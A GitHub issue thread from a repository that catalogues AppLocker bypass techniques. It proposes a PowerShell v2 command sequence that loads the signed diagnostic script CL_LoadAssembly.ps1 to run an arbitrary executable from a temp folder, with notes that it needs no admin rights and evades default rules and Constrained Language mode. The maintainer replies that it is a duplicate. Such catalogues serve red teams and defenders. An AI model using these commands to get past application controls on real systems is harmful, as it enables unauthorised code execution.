api0cradle / UltimateAppLockerByPassList

The goal of this repository is to document the most common techniques to bypass AppLocker.

CL_LoadAssembly.ps1 - Similar to already listed CL_Invocation.ps1 and Powershell version 2 #3

Closed ghost closed 6 years ago

ghost commented 6 years ago

You might want to add this:

powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ........\temp\funrun.exe

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes
Bypasses Constrained Language mode by invoking PowerShell version 2
Notes: Requires PowerShell version 2

Links: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

api0cradle commented 6 years ago

I removed the CL_Invocation since it relies on PowerShell v2. So the bypass is actually PowerShell version 2 and it is listed in the generic bypasses. Thanks for pointing it out.